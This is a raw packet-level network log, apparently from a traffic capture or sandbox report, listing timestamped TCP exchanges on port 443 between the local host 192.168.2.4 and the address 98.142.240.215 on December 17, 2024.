                                                                                                                                                                              Dec 17, 2024 18:12:38.616807938 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:38.616857052 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:38.619781971 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:38.619848967 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:38.619857073 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:38.619925976 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:38.621737003 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:38.621797085 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:38.621803045 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:38.621850014 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:38.625505924 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:38.625577927 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:38.625585079 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:38.625659943 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:38.628386021 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:38.628452063 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:38.628459930 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:38.628573895 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:38.630353928 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:38.630419970 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:38.630425930 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:38.630647898 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:38.635723114 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:38.635883093 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:38.635890961 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:38.635945082 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:38.638566017 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:38.638639927 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:38.638647079 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:38.638700008 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:38.802175999 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:38.802304029 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:38.802331924 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:38.804501057 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:38.804567099 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:38.804574966 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:38.805085897 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:38.806792021 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:38.806864023 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:38.806870937 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:38.808361053 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:38.809282064 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:38.809340000 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:38.809345961 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:38.811039925 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:38.811530113 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:38.811582088 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:38.811588049 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:38.811845064 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:38.816011906 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:38.816082954 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:38.816088915 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:38.816279888 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:38.817254066 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:38.817332029 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:38.817338943 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:38.817378044 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:38.819639921 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:38.819709063 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:38.819714069 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:38.819746971 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:38.822640896 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:38.822738886 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:38.822746992 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:38.822875977 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:38.824503899 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:38.824565887 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:38.824573040 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:38.824608088 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:38.826678038 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:38.826745987 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:38.826754093 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:38.827047110 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:38.829545021 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:38.829603910 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:38.829612017 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:38.829639912 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:38.830845118 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:38.830904007 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:38.830909967 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:38.832389116 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:38.832484007 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:38.832492113 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:38.832534075 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:38.836684942 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:38.836759090 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:38.836772919 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:38.837038994 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:38.837812901 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:38.837876081 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:38.837884903 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:38.837924957 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:38.994235039 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:38.994384050 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:38.994405985 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:38.996509075 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:38.996571064 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:38.996578932 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:38.996614933 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:38.998790979 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:38.998895884 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:38.998907089 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:39.001069069 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:39.001353979 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:39.001419067 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:39.001426935 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:39.003787994 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:39.004060030 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:39.004115105 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:39.004121065 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:39.004566908 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:39.006021976 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:39.006119013 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:39.006125927 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:39.007121086 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:39.008111000 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:39.008169889 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:39.008183956 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:39.009277105 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:39.010454893 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:39.010549068 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:39.010555029 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:39.012599945 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:39.012833118 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:39.012892962 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:39.012902021 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:39.015153885 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:39.015254021 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:39.015263081 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:39.017467976 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:39.017540932 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:39.017550945 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:39.017594099 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:39.019967079 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:39.020060062 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:39.020067930 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:39.021049023 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:39.022308111 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:39.022382975 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:39.022392988 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:39.024646997 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:39.024719954 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:39.024730921 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:39.024774075 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:39.026979923 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:39.027076960 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:39.027084112 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:39.029063940 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:39.029315948 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:39.029398918 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:39.029403925 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:39.030356884 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:39.265834093 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:39.265847921 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:39.265907049 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:39.265934944 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:39.268135071 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:39.268192053 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:39.268198967 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:39.268240929 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:39.270924091 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:39.270993948 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:39.271001101 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:39.273041964 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:39.273154974 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:39.273205996 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:39.273211002 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:39.275418997 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:39.275479078 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:39.275486946 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:39.275525093 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:39.277879953 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:39.277940035 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:39.277947903 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:39.280289888 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:39.280344963 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:39.280353069 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:39.280486107 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:39.282123089 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:39.282175064 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:39.282181025 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:39.284307003 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:39.284363031 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:39.284368992 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:39.284405947 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:39.286818981 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:39.286884069 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:39.286892891 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:39.288049936 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:39.289143085 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:39.289201975 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:39.289208889 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:39.291089058 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:39.291306973 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:39.291380882 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:39.291387081 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:39.293596983 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:39.293692112 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:39.293700933 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:39.293756008 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:39.296756029 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:39.296951056 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:39.296962023 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:39.297002077 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:39.298226118 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:39.298283100 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:39.298293114 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:39.300678968 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:39.300738096 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:39.300745964 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:39.300784111 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:39.487663984 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:39.487775087 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:39.487792969 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:39.487831116 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:39.489684105 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:39.489744902 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:39.489751101 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:39.489787102 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:39.491978884 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:39.492037058 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:39.492043018 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:39.492079020 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:39.494265079 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:39.494318962 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:39.494324923 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:39.494360924 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:39.496602058 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:39.496664047 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:39.496670008 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:39.496710062 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:39.498925924 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:39.499013901 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:39.499020100 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:39.499064922 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:39.501202106 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:39.501260996 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:39.501266956 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:39.501303911 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:39.503828049 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:39.503906012 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:39.503911972 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:39.503950119 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:39.506809950 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:39.506877899 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:39.506884098 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:39.506921053 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:39.508203983 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:39.508261919 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:39.508266926 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:39.508304119 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:39.510929108 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:39.511006117 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:39.511012077 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:39.511049986 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:39.513963938 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:39.514024973 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:39.514030933 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:39.514071941 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:39.515230894 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:39.515299082 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:39.515305042 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:39.515350103 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:39.517713070 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:39.517772913 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:39.517779112 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:39.517812967 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:39.520947933 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:39.521018982 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:39.521024942 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:39.521076918 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:39.522675991 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:39.522741079 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:39.522747040 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:39.522783995 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:39.680275917 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:39.680341959 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:39.680356979 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:39.680407047 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:39.682241917 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:39.682316065 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:39.682322025 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:39.682358027 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:39.685210943 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:39.685269117 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:39.685275078 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:39.685316086 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:39.686723948 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:39.686780930 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:39.686785936 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:39.686817884 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:39.689162016 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:39.689234018 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:39.689239979 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:39.689399958 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:39.692192078 CET4434973198.142.240.215192.168.2.4
